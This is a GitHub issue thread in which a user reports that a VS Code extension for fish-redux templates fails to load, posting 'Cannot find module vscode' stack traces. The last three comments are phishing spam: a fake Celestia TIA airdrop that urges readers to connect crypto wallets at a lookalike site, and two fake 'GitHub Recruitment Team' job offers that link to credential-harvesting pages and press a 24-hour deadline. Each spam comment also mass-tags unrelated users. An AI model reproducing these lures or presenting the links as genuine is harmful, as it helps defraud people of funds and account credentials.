### ISSUE TITLE
Can't use in VS Code version (1.35.1)

### ISSUE THREAD

**Issue by tianlinzx** [huangjianke/fish-redux-template#6]
Can't use in VS Code version (1.35.1)。
I followed the installation instruction , however the expected menu didn't appear from File menu.
OS:Mojave 10.14.5
VSCode:1.35.1
Plugin:0.0.6

**Comment by tianlinzx** [comment]
Error: Error when reading 'bin/main.dart': No such file or directory
Exited (sigint)

**Comment by tianlinzx** [comment]
Attribute 'program' does not exist ('/Volumes/Data/github/flutter/fish-redux-template/out/extension.js').

**Comment by tianlinzx** [comment]
/usr/local/bin/node --inspect-brk=45440 out/extension.js 
Debugger listening on ws://127.0.0.1:45440/bc78c05e-4ba8-4c28-87ed-df507cbb313c
For help, see: https://nodejs.org/en/docs/inspector
Debugger attached.
internal/modules/cjs/loader.js:626
    throw err;
    ^

Error: Cannot find module 'vscode'
Require stack:
- /Volumes/Data/github/flutter/fish-redux-template/out/extension.js
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:623:15)
    at Function.Module._load (internal/modules/cjs/loader.js:527:27)
    at Module.require (internal/modules/cjs/loader.js:681:19)
    at require (internal/modules/cjs/helpers.js:16:16)
    at Object.<anonymous> (/Volumes/Data/github/flutter/fish-redux-template/out/extension.js:11:16)
    at Module._compile (internal/modules/cjs/loader.js:771:14)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:785:10)
    at Module.load (internal/modules/cjs/loader.js:641:32)
    at Function.Module._load (internal/modules/cjs/loader.js:556:12)
    at Function.Module.runMain (internal/modules/cjs/loader.js:837:10) {
  code: 'MODULE_NOT_FOUND',
  requireStack: [
    '/Volumes/Data/github/flutter/fish-redux-template/out/extension.js'
  ]
}
Waiting for the debugger to disconnect...
Error: Cannot find module 'vscode'
Require stack:
- /Volumes/Data/github/flutter/fish-redux-template/out/extension.js
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:623:15)
    at Function.Module._load (internal/modules/cjs/loader.js:527:27)
    at Module.require (internal/modules/cjs/loader.js:681:19)
    at require (internal/modules/cjs/helpers.js:16:16)
    at Object.<anonymous> (/Volumes/Data/github/flutter/fish-redux-template/src/extension.ts:3:1)
    at Module._compile (internal/modules/cjs/loader.js:771:14)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:785:10)
    at Module.load (internal/modules/cjs/loader.js:641:32)
    at Function.Module._load (internal/modules/cjs/loader.js:556:12)
    at Function.Module.runMain (internal/modules/cjs/loader.js:837:10) {
  code: 'MODULE_NOT_FOUND',
  requireStack: [
    '/Volumes/Data/github/flutter/fish-redux-template/out/extension.js'
  ]
}

**Comment by tianlinzx** [comment]
@huangjianke  Any Idea ?

**Comment by NnajiChimuanya** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!990025525, @lilpacy, @Shpota, @nilref, @Jefferderp, @JimZhangSpace, @mahad53, @saadazghour, @Hussajn, @khadorkin, @emeruvia, @cneilmon, @xanoni, @bergpb, @Ryz0nd, @TerrenceTrey, @pantaovay, @rengetsu, @ligulfzhou, @jie3615

**Comment by willianfcamara** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
bowlmeat, @qian-hu, @th3-j0k3r, @Silence1017, @czar0, @bt3gl, @laurikjk, @samsheff, @kenrogers, @SinTan1071, @iliuyongkang, @Snowpine, @j4ckm4rt, @eatsleepraverepeat, @CyberHype, @fbac, @kigsmtua, @mourginakis, @yumingvvv, @WeissCatWithHat

**Comment by appsplash99** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
zyi10, @adosix, @Vishal-Isharani, @joseabraham, @JiuBanA1, @ksp-04, @Thieuduongk, @null-prophet, @odgen193, @qpages, @Financetrade-option, @cagrioz, @Xeway, @zhichicao, @heny, @xyz-zz, @saleebm, @AlotOfBlahaj, @hamed-afshar, @GabrieleBarberio
